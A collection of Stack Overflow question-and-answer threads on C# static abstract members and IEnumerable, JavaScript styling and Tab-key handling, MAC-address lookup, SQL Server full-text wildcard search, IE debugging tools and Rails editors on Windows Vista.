public class CatSpecies : SpeciesFor<Cat>
{
// overriden "static" members
public override string ScientificName => "Felis catus";
public override Cat CreateInVivoFromDnaTrappedInAmber() { … }
public override Cat Clone(Cat a) { … }
public override Cat Breed(Cat a1, Cat a2) { … }
}
public class Cat : Animal<Cat>.OfSpecies<CatSpecies>
{
// overriden members
public override string CuteName { get { … } }
}
public class DogSpecies : SpeciesFor<Dog>
{
// overriden "static" members
public override string ScientificName => "Canis lupus familiaris";
public override Dog CreateInVivoFromDnaTrappedInAmber() { … }
public override Dog Clone(Dog a) { … }
public override Dog Breed(Dog a1, Dog a2) { … }
}
public class Dog : Animal<Dog>.OfSpecies<DogSpecies>
{
// overriden members
public override string CuteName { get { … } }
}
public class Program
{
public static void Main()
{
ConductCrazyScientificExperimentsWith<Cat>();
ConductCrazyScientificExperimentsWith<Dog>();
ConductCrazyScientificExperimentsWith<Tyranosaurus>();
ConductCrazyScientificExperimentsWith<Wyvern>();
}
public static void ConductCrazyScientificExperimentsWith<TAnimal>()
where TAnimal : Animal<TAnimal>
{
// Look Ma! No animal instance polymorphism!
TAnimal a2039 = SpeciesFor<TAnimal>.Instance.CreateInVivoFromDnaTrappedInAmber();
TAnimal a2988 = SpeciesFor<TAnimal>.Instance.CreateInVivoFromDnaTrappedInAmber();
TAnimal a0400 = SpeciesFor<TAnimal>.Instance.Clone(a2988);
TAnimal a9477 = SpeciesFor<TAnimal>.Instance.Breed(a0400, a2039);
TAnimal a9404 = SpeciesFor<TAnimal>.Instance.Breed(a2988, a9477);
Console.WriteLine(
"The confederation of mad scientists is happy to announce the birth " +
$"of {a9404.CuteName}, our new {SpeciesFor<TAnimal>.Instance.ScientificName}.");
}
}
A limitation of this pattern is that it is not possible (as far as I can tell) to extend the class hierarchy in a satisfying manner. For example we cannot introduce an intermediary Mammal class associated to a MammalClass companion. Another is that it does not work for static members in interfaces which would be more flexible than abstract classes.
A: Abstract methods are implicitly virtual, and virtual dispatch requires an instance; static methods are not invoked on an instance. So you can have a static method in an abstract class, it just cannot be static abstract (or abstract static).
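A minimal sketch of that distinction, using hypothetical names:
public abstract class Repository
{
    // Fine: a concrete static member on an abstract class.
    public static string DefaultName() { return "default"; }

    // Fine: an abstract instance member, overridden by subclasses.
    public abstract string Name();

    // Does not compile: 'static' and 'abstract' cannot be combined here.
    // public static abstract string Key();
}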
A: It's available in C# 10 as a preview feature for now.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3284",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "208"
} |
Q: Can I have a method returning IEnumerator and use it in a foreach loop? I need to set the height of every textbox on my form, some of which are nested within other controls. I thought I could do something like this:
private static IEnumerator<TextBox> FindTextBoxes(Control rootControl)
{
foreach (Control control in rootControl.Controls)
{
if (control.Controls.Count > 0)
{
// Recursively search for any TextBoxes within each child control
foreach (TextBox textBox in FindTextBoxes(control))
{
yield return textBox;
}
}
TextBox textBox2 = control as TextBox;
if (textBox2 != null)
{
yield return textBox2;
}
}
}
Using it like this:
foreach(TextBox textBox in FindTextBoxes(this))
{
textBox.Height = height;
}
But of course the compiler spits its dummy, because foreach expects an IEnumerable rather than an IEnumerator.
Is there a way to do this without having to create a separate class with a GetEnumerator() method?
A: If you return IEnumerator, it will be a different enumerator object each time you call that method (acting as though you reset the enumerator on each iteration). If you return IEnumerable then a foreach can enumerate based on the method with the yield statement.
A: As the compiler is telling you, you need to change your return type to IEnumerable. That is how the yield return syntax works.
A: Just to clarify
private static IEnumerator<TextBox> FindTextBoxes(Control rootControl)
Changes to
private static IEnumerable<TextBox> FindTextBoxes(Control rootControl)
That should be all :-)
A: // Generic function that gets all child controls of a certain type,
// returned in a List collection
private static List<T> GetChildTextBoxes<T>(Control ctrl) where T : Control{
List<T> tbs = new List<T>();
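// Note: ctrl.Controls yields only direct children; recurse into child controls if nested containers must be searched.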
foreach (Control c in ctrl.Controls) {
// If c is of type T, add it to the collection
if (c is T) {
tbs.Add((T)c);
}
}
return tbs;
}
private static void SetChildTextBoxesHeight(Control ctrl, int height) {
foreach (TextBox t in GetChildTextBoxes<TextBox>(ctrl)) {
t.Height = height;
}
}
A: If you are given an enumerator, and need to use it in a for-each loop, you could use the following to wrap it:
public static class enumerationHelper
{
public class enumeratorHolder<T>
{
private T theEnumerator;
public T GetEnumerator() { return theEnumerator; }
public enumeratorHolder(T newEnumerator) { theEnumerator = newEnumerator;}
}
public static enumeratorHolder<T> toEnumerable<T>(T theEnumerator) { return new enumeratorHolder<T>(theEnumerator); }
private class IEnumeratorHolder<T>:IEnumerable<T>
{
private IEnumerator<T> theEnumerator;
public IEnumerator<T> GetEnumerator() { return theEnumerator; }
System.Collections.IEnumerator System.Collections.IEnumerable.GetEnumerator() { return theEnumerator; }
public IEnumeratorHolder(IEnumerator<T> newEnumerator) { theEnumerator = newEnumerator; }
}
public static IEnumerable<T> toEnumerable<T>(IEnumerator<T> theEnumerator) { return new IEnumeratorHolder<T>(theEnumerator); }
}
The toEnumerable method will accept anything that c# or vb would regard an acceptable return type from GetEnumerator, and return something that can be used in foreach. If the parameter is an IEnumerator<> the response will be an IEnumerable<T>, though calling GetEnumerator on it once will likely yield bad results.
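A hypothetical usage, wrapping an enumerator-returning method like the one in the question so that foreach accepts it (height is assumed to be defined, as in the question):
IEnumerator<TextBox> boxes = FindTextBoxes(this);
foreach (TextBox textBox in enumerationHelper.toEnumerable(boxes))
{
    textBox.Height = height;
}
Note that the wrapped enumerable is single-use: enumerate it once only.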
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3315",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: How to set background color of HTML element using css properties in JavaScript How can I set the background color of an HTML element using css in JavaScript?
A: Add this script element to your body element:
<body>
<script type="text/javascript">
document.body.style.backgroundColor = "#AAAAAA";
</script>
</body>
A:
var element = document.getElementById('element');
element.onclick = function() {
element.classList.add('backGroundColor');
setTimeout(function() {
element.classList.remove('backGroundColor');
}, 2000);
};
.backGroundColor {
background-color: green;
}
<div id="element">Click Me</div>
A: You can try this
var element = document.getElementById('element_id');
element.style.backgroundColor = "color or color_code";
Example.
var element = document.getElementById('firstname');
element.style.backgroundColor = "green";//Or #ff55ff
JSFIDDLE
A: KISS Answer:
document.getElementById('element').style.background = '#DD00DD';
A: You can do it with JQuery:
$(".class").css("background","yellow");
A: You might find your code is more maintainable if you keep all your styles, etc. in CSS and just set / unset class names in JavaScript.
Your CSS would obviously be something like:
.highlight {
background:#ff00aa;
}
Then in JavaScript:
element.className = element.className === 'highlight' ? '' : 'highlight';
A: You can use:
<script type="text/javascript">
document.body.style.backgroundColor = "#5a5a5a";
</script>
A: $("body").css("background","green"); //jQuery
document.body.style.backgroundColor = "green"; //javascript
so many ways are there I think it is very easy and simple
Demo On Plunker
A: $('#ID / .Class').css('background-color', '#FF6600');
By using jQuery we can target the element's class or ID to apply a CSS background or any other styling.
A: var element = document.getElementById('element');
element.style.background = '#FF00AA';
A: Or, using a little jQuery:
$('#fieldID').css('background-color', '#FF6600');
A: In general, CSS properties are converted to JavaScript by making them camelCase without any dashes. So background-color becomes backgroundColor.
function setColor(element, color)
{
element.style.backgroundColor = color;
}
// where el is the concerned element
var el = document.getElementById('elementId');
setColor(el, 'green');
A: you can use
$('#elementID').css('background-color', '#C0C0C0');
A: Changing CSS of a HTMLElement
You can change most of the CSS properties with JavaScript, use this statement:
document.querySelector(<selector>).style[<property>] = <new style>
where <selector>, <property>, <new style> are all String objects.
Usually, the style property will have the same name as the actual name used in CSS. But whenever there is more than one word, it will be camel case: for example background-color becomes backgroundColor.
The following statement will set the background of #container to the color red:
document.querySelector('#container').style.background = 'red'
Here's a quick demo changing the color of the box every 0.5s:
const colors = ['rosybrown', 'cornflowerblue', 'pink', 'lightblue', 'lemonchiffon', 'lightgrey', 'lightcoral', 'blueviolet', 'firebrick', 'fuchsia', 'lightgreen', 'red', 'purple', 'cyan']
let i = 0
setInterval(() => {
const random = Math.floor(Math.random()*colors.length)
document.querySelector('.box').style.background = colors[random];
}, 500)
.box {
width: 100px;
height: 100px;
}
<div class="box"></div>
Changing CSS of multiple HTMLElements
Imagine you would like to apply CSS styles to more than one element, for example, make the background color of all elements with the class name box lightgreen. Then you can:
*
*select the elements with .querySelectorAll and spread them into an Array with the spread syntax:
const elements = [...document.querySelectorAll('.box')]
*loop over the array with .forEach and apply the change to each element:
elements.forEach(element => element.style.background = 'lightgreen')
Here is the demo:
const elements = [...document.querySelectorAll('.box')]
elements.forEach(element => element.style.background = 'lightgreen')
.box {
height: 100px;
width: 100px;
display: inline-block;
margin: 10px;
}
<div class="box"></div>
<div class="box"></div>
<div class="box"></div>
<div class="box"></div>
Another method
If you want to change multiple style properties of an element more than once you may consider using another method: link this element to another class instead.
Assuming you can prepare the styles beforehand in CSS you can toggle classes by accessing the classList of the element and calling the toggle function:
document.querySelector('.box').classList.toggle('orange')
.box {
width: 100px;
height: 100px;
}
.orange {
background: orange;
}
<div class='box'></div>
List of CSS properties in JavaScript
Here is the complete list:
alignContent
alignItems
alignSelf
animation
animationDelay
animationDirection
animationDuration
animationFillMode
animationIterationCount
animationName
animationTimingFunction
animationPlayState
background
backgroundAttachment
backgroundColor
backgroundImage
backgroundPosition
backgroundRepeat
backgroundClip
backgroundOrigin
backgroundSize
backfaceVisibility
borderBottom
borderBottomColor
borderBottomLeftRadius
borderBottomRightRadius
borderBottomStyle
borderBottomWidth
borderCollapse
borderColor
borderImage
borderImageOutset
borderImageRepeat
borderImageSlice
borderImageSource
borderImageWidth
borderLeft
borderLeftColor
borderLeftStyle
borderLeftWidth
borderRadius
borderRight
borderRightColor
borderRightStyle
borderRightWidth
borderSpacing
borderStyle
borderTop
borderTopColor
borderTopLeftRadius
borderTopRightRadius
borderTopStyle
borderTopWidth
borderWidth
bottom
boxShadow
boxSizing
captionSide
clear
clip
color
columnCount
columnFill
columnGap
columnRule
columnRuleColor
columnRuleStyle
columnRuleWidth
columns
columnSpan
columnWidth
counterIncrement
counterReset
cursor
direction
display
emptyCells
filter
flex
flexBasis
flexDirection
flexFlow
flexGrow
flexShrink
flexWrap
content
fontStretch
hangingPunctuation
height
hyphens
icon
imageOrientation
navDown
navIndex
navLeft
navRight
navUp
cssFloat
font
fontFamily
fontSize
fontStyle
fontVariant
fontWeight
fontSizeAdjust
justifyContent
left
letterSpacing
lineHeight
listStyle
listStyleImage
listStylePosition
listStyleType
margin
marginBottom
marginLeft
marginRight
marginTop
maxHeight
maxWidth
minHeight
minWidth
opacity
order
orphans
outline
outlineColor
outlineOffset
outlineStyle
outlineWidth
overflow
overflowX
overflowY
padding
paddingBottom
paddingLeft
paddingRight
paddingTop
pageBreakAfter
pageBreakBefore
pageBreakInside
perspective
perspectiveOrigin
position
quotes
resize
right
tableLayout
tabSize
textAlign
textAlignLast
textDecoration
textDecorationColor
textDecorationLine
textDecorationStyle
textIndent
textOverflow
textShadow
textTransform
textJustify
top
transform
transformOrigin
transformStyle
transition
transitionProperty
transitionDuration
transitionTimingFunction
transitionDelay
unicodeBidi
userSelect
verticalAlign
visibility
voiceBalance
voiceDuration
voicePitch
voicePitchRange
voiceRate
voiceStress
voiceVolume
whiteSpace
width
wordBreak
wordSpacing
wordWrap
widows
writingMode
zIndex
A: Javascript:
document.getElementById("ID").style.background = "colorName"; //JS ID
document.getElementsByClassName("ClassName")[0].style.background = "colorName"; //JS Class
Jquery:
$('#ID/.className').css("background","colorName") // One style
$('#ID/.className').css({"background":"colorName","color":"colorname"}); //Multiple style
A: A simple js can solve this:
document.getElementById("idName").style.background = "blue";
A: $(".class")[0].style.background = "blue";
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3319",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "129"
} |
Q: Capturing TAB key in text box I would like to be able to use the Tab key within a text box to tab over four spaces. The way it is now, the Tab key jumps my cursor to the next input.
Is there some JavaScript that will capture the Tab key in the text box before it bubbles up to the UI?
I understand some browsers (i.e. FireFox) may not allow this. How about a custom key-combo like Shift+Tab, or Ctrl+Q?
A: I would advise against changing the default behaviour of a key. I do as much as possible without touching a mouse, so if you make my tab key not move to the next field on a form I will be very aggravated.
A shortcut key could be useful however, especially with large code blocks and nesting. Shift-TAB is a bad option because that normally takes me to the previous field on a form. Maybe a new button on the WMD editor to insert a code-TAB, with a shortcut key, would be possible?
A: In Chrome on the Mac, alt-tab inserts a tab character into a <textarea> field.
Here’s one: . Wee!
A: There is a problem in the best answer given by ScottKoon.
Here it is:
} else if(el.attachEvent ) {
myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */
}
Should be
} else if(myInput.attachEvent ) {
myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */
}
Because of this, it didn't work in IE. Hopefully ScottKoon will update the code.
A: I'd rather tab indentation not work than break tabbing between form items.
If you want to indent to put in code in the Markdown box, use Ctrl+K (or ⌘K on a Mac).
In terms of actually stopping the action, jQuery (which Stack Overflow uses) will stop an event from bubbling when you return false from an event callback. This makes life easier for working with multiple browsers.
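A minimal jQuery sketch of that (the selector and the four-space insert are illustrative, not part of the original answer):
$('#myInput').keydown(function(e) {
    if (e.keyCode === 9) { // Tab
        this.value += "    "; // insert four spaces instead
        return false; // jQuery: prevents the default action and stops bubbling
    }
});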
A: The previous answer is fine, but I'm one of those guys that's firmly against mixing behavior with presentation (putting JavaScript in my HTML) so I prefer to put my event handling logic in my JavaScript files. Additionally, not all browsers implement event (or e) the same way. You may want to do a check prior to running any logic:
document.onkeydown = TabExample;
function TabExample(evt) {
var evt = (evt) ? evt : ((event) ? event : null);
var tabKey = 9;
if(evt.keyCode == tabKey) {
// do work
}
}
A: Even if you capture the keydown/keyup event, those are the only events that the tab key fires, you still need some way to prevent the default action, moving to the next item in the tab order, from occurring.
In Firefox you can call the preventDefault() method on the event object passed to your event handler. In IE, you have to return false from the event handler. The jQuery library provides a preventDefault method on its event object that works in IE and FF.
<body>
<input type="text" id="myInput">
<script type="text/javascript">
var myInput = document.getElementById("myInput");
if(myInput.addEventListener ) {
myInput.addEventListener('keydown',this.keyHandler,false);
} else if(myInput.attachEvent ) {
myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */
}
function keyHandler(e) {
var TABKEY = 9;
if(e.keyCode == TABKEY) {
this.value += " ";
if(e.preventDefault) {
e.preventDefault();
}
return false;
}
}
</script>
</body>
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3362",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "109"
} |
Q: MAC addresses in JavaScript I know that we can get the MAC address of a user via IE (ActiveX objects).
Is there a way to obtain a user's MAC address using JavaScript?
A: I concur with all the previous answers that it would be a privacy/security vulnerability if you would be able to do this directly from Javascript. There are two things I can think of:
*
*Using Java (with a signed applet)
*Using signed Javascript, which in FF (and Mozilla in general) gets higher privileges than normal JS (but it is fairly complicated to set up)
A: If this is for an intranet application and all of the clients use DHCP, you can query the DHCP server for the MAC address for a given IP address.
A: Nope. The reason ActiveX can do it is because ActiveX is a little application that runs on the client's machine.
I would imagine access to such information via JavaScript would be a security vulnerability.
A: The quick and simple answer is No.
Javascript is quite a high level language and does not have access to this sort of information.
A: I was looking at the same problem and stumbled upon the following code.
How to get the client MAC address (web):
To get the client MAC address, the only way is to rely on JavaScript and Microsoft's ActiveX control, so it works only in IE, and only if ActiveX is enabled. Since ActiveXObject is not available in Firefox, the script does not work there; it works fine in IE.
This script is for IE only:
function showMacAddress() {
var obj = new ActiveXObject("WbemScripting.SWbemLocator");
var s = obj.ConnectServer(".");
var properties = s.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration");
var e = new Enumerator(properties);
var output;
output = '<table border="0" cellPadding="5px" cellSpacing="1px" bgColor="#CCCCCC">';
output = output + '<tr bgColor="#EAEAEA"><td>Caption</td><td>MACAddress</td></tr>';
while (!e.atEnd()) {
var p = e.item(); // read the current item before advancing, so the first adapter is not skipped
e.moveNext();
if (!p) continue;
output = output + '<tr bgColor="#FFFFFF">';
output = output + '<td>' + p.Caption + '</td>';
output = output + '<td>' + p.MACAddress + '</td>';
output = output + '</tr>';
}
output = output + '</table>';
document.getElementById("box").innerHTML = output;
}
showMacAddress();
<div id='box'></div>
A: No you cannot get the MAC address in JavaScript, mainly because the MAC address uniquely identifies the running computer so it would be a security vulnerability.
Now if all you need is a unique identifier, I suggest you create one yourself using some cryptographic algorithm and store it in a cookie.
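A hedged sketch of that idea (names are illustrative; Math.random is not cryptographically strong, so prefer crypto.getRandomValues where available):
function makeId(len) {
    var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    var id = '';
    for (var i = 0; i < len; i++) {
        id += chars.charAt(Math.floor(Math.random() * chars.length));
    }
    return id;
}
// Persist it for roughly a year under a hypothetical cookie name "uid".
document.cookie = 'uid=' + makeId(40) + '; max-age=' + (60 * 60 * 24 * 365) + '; path=/';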
If you really need to know the MAC address of the computer AND you are developing for internal applications, then I suggest you use an external component to do that: ActiveX for IE, XPCOM for Firefox (installed as an extension).
A: I know I am really late to this party, and although the answer is still no, I found a way to generate and store a unique id that helps to keep track of a user while they navigate the site.
When the user signs up, I then have a full record of what pages he visited before he signed up. I also store this id in the user table for historical reference.
This is also handy when you're looking for dubious activity. For example, a user that has created multiple accounts. I should note that this is on a financial transaction site and the data is only used internally. It does really help to cut down on fraudulent and duped accounts. There is a lot that can be done with localStorage and this method, but I will keep this short to not give anyone nefarious ideas.
1- Generate a random string. If you generate a 40 char string, you don't really have too much to worry about as far as them colliding. We're not looking to send a rocket to Mars here.
I use a small PHP function to generate a 40 char string. I use Ajax to call this function and retrieve the result.
function genrandstr($length=NULL) {
if($length == NULL){ $length = 30; }
$characters =
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, $charactersLength - 1)];
}
return $randomString;
}
localStorage.setItem('id', id); // add the id to localStorage
let id = localStorage.getItem('id'); // (or var) read it back from localStorage
2- Using cookies, you can store this id in a cookie.
3- LocalStorage is your friend. Store the same id in LocalStorage and chances are, you will always have that id to look at.
With an id stored in LocalStorage, your user can delete cookies and you'd still be able to recognize an old visitor by this id.
If the user deletes all their data, then you're SOL and start all over again when they revisit.
Have Fun
A: No, you can't obtain a user's MAC address using JavaScript any other way; the only option is Microsoft's ActiveX, in the IE browser.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3385",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "124"
} |
Q: How do you get leading wildcard full-text searches to work in SQL Server? Note: I am using SQL's Full-text search capabilities, CONTAINS clauses and all - the * is the wildcard in full-text, % is for LIKE clauses only.
I've read in several places now that "leading wildcard" searches (e.g. using "*overflow" to match "stackoverflow") is not supported in MS SQL. I'm considering using a CLR function to add regex matching, but I'm curious to see what other solutions people might have.
More Info: You can add the asterisk only at the end of the word or phrase. - along with my empirical experience: When matching "myvalue", "my*" works, but "(asterisk)value" returns no match, when doing a query as simple as:
SELECT * FROM TABLENAME WHERE CONTAINS(TextColumn, '"*searchterm"');
Thus, my need for a workaround. I'm only using search in my site on an actual search page - so it needs to work basically the same way that Google works (in the eyes on a Joe Sixpack-type user). Not nearly as complicated, but this sort of match really shouldn't fail.
A: To perhaps add clarity to this thread, from my testing on 2008 R2, Franjo is correct above. When dealing with full-text searching, at least when using the CONTAINS phrase, you cannot use a leading *, only a trailing *, functionally. * is the wildcard, not %, in full text.
Some have suggested that * is ignored. That does not seem to be the case; my results seem to show that the trailing * functionality does work. I think leading *s are ignored by the engine.
My added problem however is that the same query, with a trailing *, that uses full text with wildcards worked relatively fast on 2005 (20 seconds), and slowed to 12 minutes after migrating the db to 2008 R2. It seems at least one other user had similar results and he started a forum post which I added to... FREETEXT works fast still, but something "seems" to have changed with the way 2008 processes trailing * in CONTAINS. They give all sorts of warnings in the Upgrade Advisor that they "improved" FULL TEXT so your code may break, but unfortunately they do not give you any specific warnings about certain deprecated code etc. ...just a disclaimer that they changed it, use at your own risk.
http://social.msdn.microsoft.com/Forums/ar-SA/sqlsearch/thread/7e45b7e4-2061-4c89-af68-febd668f346c
Maybe, this is the closest MS hit related to these issues... http://msdn.microsoft.com/en-us/library/ms143709.aspx
A: Note: this was the answer I submitted for the original version #1 of the question before the CONTAINS keyword was introduced in revision #2. It's still factually accurate.
The wildcard character in SQL Server is the % sign and it works just fine, leading, trailing or otherwise.
That said, if you're going to be doing any kind of serious full text searching then I'd consider utilising the Full Text Index capabilities. Using % and _ wild cards will cause your database to take a serious performance hit.
A: One thing worth keeping in mind is that leading wildcard queries come at a significant performance premium, compared to other wildcard usages.
A: Workaround only for leading wildcard:
*
*store the text reversed in a different field (or in materialised view)
*create a full text index on this column
*find the reversed text with an *
SELECT *
FROM TABLENAME
WHERE CONTAINS(TextColumnREV, '"mrethcraes*"');
Of course there are many drawbacks, just for quick workaround...
Not to mention CONTAINSTABLE...
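A minimal sketch of step 1, reusing the table and column names from the question (if your SQL Server version refuses to full-text index a computed column, maintain a real column via trigger instead):
-- Hypothetical setup: a persisted reversed copy of the text column
ALTER TABLE TABLENAME ADD TextColumnREV AS REVERSE(TextColumn) PERSISTED;
-- Then create the full-text index on TextColumnREV as usual.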
A: The problem with leading Wildcards: They cannot be indexed, hence you're doing a full table scan.
A: It is possible to use the wildcard "*" at the end of the word or phrase (prefix search).
For example, this query will find all "datab", "database", "databases" ...
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, '"datab*"')
But, unforutnately, it is not possible to search with leading wildcard.
For example, this query will not find "database"
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, '"*abase"')
A: Just FYI, Google does not do any substring searches or truncation, right or left. They have a wildcard character * to find unknown words in a phrase, but not a word.
Google, along with most full-text search engines, sets up an inverted index based on the alphabetical order of words, with links to their source documents. Binary search is wicked fast, even for huge indexes. But it's really really hard to do a left-truncation in this case, because it loses the advantage of the index.
A: As a parameter in a stored procedure you can use it as:
ALTER procedure [dbo].[uspLkp_DrugProductSelectAllByName]
(
@PROPRIETARY_NAME varchar(10)
)
as
set nocount on
declare @PROPRIETARY_NAME2 varchar(20) = '"' + @PROPRIETARY_NAME + '*"' -- sized to fit the added quotes and trailing *
select ldp.*, lkp.DRUG_PKG_ID
from Lkp_DrugProduct ldp
left outer join Lkp_DrugPackage lkp on ldp.DRUG_PROD_ID = lkp.DRUG_PROD_ID
where contains(ldp.PROPRIETARY_NAME, @PROPRIETARY_NAME2)
A: When it comes to full-text searching, for my money nothing beats Lucene. There is a .Net port available that is compatible with indexes created with the Java version.
There's a little work involved in that you have to create/maintain the indexes, but the search speed is fantastic and you can create all sorts of interesting queries. Even indexing speed is pretty good - we just completely rebuild our indexes once a day and don't worry about updating them.
As an example, this search functionality is powered by Lucene.Net.
A: Perhaps the following link will provide the final answer to this use of wildcards: Performing FTS Wildcard Searches.
Note the passage that states: "However, if you specify “*Chain” or “*Chain*”, you will not get the expected result. The asterisk will be considered as a normal punctuation mark not a wildcard character."
A: If you have access to the list of words of the full-text search engine, you could do a 'like' search on this list and match the database with the words found, e.g. a table 'words' with the following words:
pie
applepie
spies
cherrypie
dog
cat
To match all words containing 'pie' in this database on a fts table 'full_text' with field 'text':
to-match <- SELECT word FROM words WHERE word LIKE '%pie%'
matcher = ""
a = ""
foreach(m, to-match) {
matcher += a
matcher += m
a = " OR "
}
SELECT text FROM full_text WHERE text MATCH matcher
A: % Matches any number of characters
_ Matches a single character
I've never used Full-Text indexing but you can accomplish rather complex and fast search queries with simply using the build in T-SQL string functions.
A: From SQL Server Books Online:
To write full-text queries in Microsoft SQL Server 2005, you must learn how to use the CONTAINS and FREETEXT Transact-SQL predicates, and the CONTAINSTABLE and FREETEXTTABLE rowset-valued functions.
That means all of the queries written above with the % and _ are not valid full text queries.
Here is a sample of what a query looks like when calling the CONTAINSTABLE function.
SELECT RANK, *
FROM TableName,
     CONTAINSTABLE(TableName, *, ' "*WildCard" ') searchTable
WHERE [KEY] = TableName.pk
ORDER BY searchTable.RANK DESC
In order for the CONTAINSTABLE function to know that I'm using a wildcard search, I have to wrap it in double quotes. I can use the wildcard character * at the beginning or ending. There are a lot of other things you can do when you're building the search string for the CONTAINSTABLE function. You can search for a word near another word, search for inflectional words (drive = drives, drove, driving, and driven), and search for synonym of another word (metal can have synonyms such as aluminum and steel).
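Hedged examples of those CONTAINS search terms, reusing the SomeTable/ColumnName names from the earlier answer:
-- A word near another word
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, 'ice NEAR cream');
-- Inflectional forms of "drive"
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, 'FORMSOF(INFLECTIONAL, drive)');
-- Thesaurus synonyms of "metal"
SELECT * FROM SomeTable WHERE CONTAINS(ColumnName, 'FORMSOF(THESAURUS, metal)');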
I just created a table, put a full text index on the table and did a couple of test searches and didn't have a problem, so wildcard searching works as intended.
[Update]
I see that you've updated your question and know that you need to use one of the functions.
You can still search with the wildcard at the beginning, but if the word is not a full word following the wildcard, you have to add another wildcard at the end.
Example: "*ildcar" will look for a single word as long as it ends with "ildcar".
Example: "*ildcar*" will look for a single word with "ildcar" in the middle, which means it will match "wildcard". [Just noticed that Markdown removed the wildcard characters from the beginning and ending of my quoted string here.]
[Update #2]
Dave Ward - Using a wildcard with one of the functions shouldn't be a huge perf hit. If I created a search string with just "*", it will not return all rows, in my test case, it returned 0 records.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3400",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "50"
} |
Q: JavaScript Troubleshooting Tools in Internet Explorer I use Firebug and the Mozilla JS console heavily, but every now and then I run into an IE-only JavaScript bug, which is really hard to locate (ex: error on line 724, when the source HTML only has 200 lines).
I would love to have a lightweight JS tool (a la firebug) for Internet Explorer, something I can install in seconds on a client's PC if I run into an error and then uninstall. Some Microsoft tools take some serious download and configuration time.
Any ideas?
A: I would recommend Companion JS.
This is the free version of Debug Bar but I find it easier to use and have the features I need. Great to test little JavaScript snippets in IE the same way I do with Firebug in Firefox.
EDIT 5 years later: I now use Internet Explorer's integrated developer tools.
A: IE 8 is supposed to have better tools, but the IE Developer Toolbar is pretty good.
A: You might find Firebug Lite useful for that.
Its bookmarklet should be especially useful when debugging on a user's machine.
A: I use both Microsoft Script Debugger and FireBug Lite, depending on what I am debugging. Both are great tools- try them both out and stich with what you're comfortable with.
A: Since Internet Explorer 8, IE has been shipping with a pretty impressive set of tools for JavaScript debugging, profiling, and more. Like most other browsers, the developer tools are accessible by pressing F12 on your keyboard.
Script Tab
The Script tab is likely what you'll be interested in, though the Console, Profiler, and Network tabs get plenty of use as well while debugging applications.
From the Script tab you can:
*
*Format JavaScript to make it more readable
*Move from source to source of various resources on the page
*Insert breakpoints
*Move in and over lines of code while stepping through its execution
*Watch variables
*Inspect the call stack to see how code was executed
*Toggle breakpoints
*and more...
Console Tab
The console tab is great for when you need to execute some arbitrary code against the application. I use this to check the return of certain methods, or even to quickly test solutions for answers on Stack Overflow.
Profiler Tab
The profile is awesome if you're looking for long-running processes, or trying to optimize your code to run smoother or make fewer calls to resource-intensive methods. Open up any page and click "Start profiling" from the Profiler tab to start recording.
While the profiler is working, you can move about the page, performing common actions. When you feel you've recorded enough, hit "Stop profiling." You will then be shown a summary of all functions ran, or a call tree. You can quickly sort this data by various columns:
Network Tab
The network tab will record traffic on your site/application. It's very handy for finding files that aren't being downloaded, hanging, or for tracking data that is being requested asynchronously.
Within this tab you can also move between a Summary view and a Detailed view. Within the Detailed view you can inspect headers sent with requests, and responses. You can view cookie information, check the timing of events, and more.
I'm not really doing the IE Developer Tools justice - there is a lot of uncovered ground. I would encourage you to check them out though, and make them a part of your development.
A: In IE8 just press F12!
A: *
*Go to Tools->Internet Options…->Advanced->Enable Script Debugging (Internet Explorer)
then attach Visual Studio Debugger when an error occurs.
If you're using IE 8, install the developer toolbar because it has a built in debugger.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3404",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "44"
} |
Q: Ruby On Rails with Windows Vista - Best Setup? What do you think is the best set-up for RoR in a Win Vista environment? I've tried the radrails eclipse plug-in, and it just seemed too bulky for me, I've also started to just use Textpad and the command line, but I'm used to having somewhat of an IDE to work with.
A: e-texteditor seems to be growing as the editor of choice for Rails development on Windows. Too bad it isn't free.
Aside from that, the RailsOnWindows guide works fine. And Sqlite is by far your best choice for development: RailsWithSqlite
A: NetBeans is definitely recommended if you like IDEs. It has a lot of Ruby features and there's a Ruby only download.
A: There probably isn't a definitive "right" answer - it's going to depend on how you like to develop.
However, it's interesting to note that most of the "name" Rails folk seem to use Textmate on their Macs. So a fairly powerful editor rather than an IDE. I suspect this is at least in part because of the fairly strong TDD bias within the Rails community - not so much debugging being necessary because they're working in small test-driven steps. That's the theory anyway.
The closest analog to Textmate in Windows seems to be e. It costs, but a fairly trivial amount (pocket-money, if we're honest). There's a 30-day free evaluation available too.
I've used Scite for much of my Ruby/Rails work, don't discard it just because it's the "default" - there's a reason why it was chosen for inclusion.
As for IDEs, I couldn't get anything to work in Eclipse, NetBeans seems quite good and I tried the beta of Sapphire in Steel, also pretty slick. I just don't seem to want to work in an IDE; the opposite of how I feel about working in C#, strangely enough.
A: Are you just looking for an IDE, or a full stack (IDE, source control, database, web server)?
If just an IDE, I would recommend NetBeans or RadRails. Both have syntax highlighting, code help, support for Rails projects, code completion, and basically everything else you would expect to find in a full-featured IDE. Both are also completely free. Of course, both suffer from the "bulky" problem that you identify.
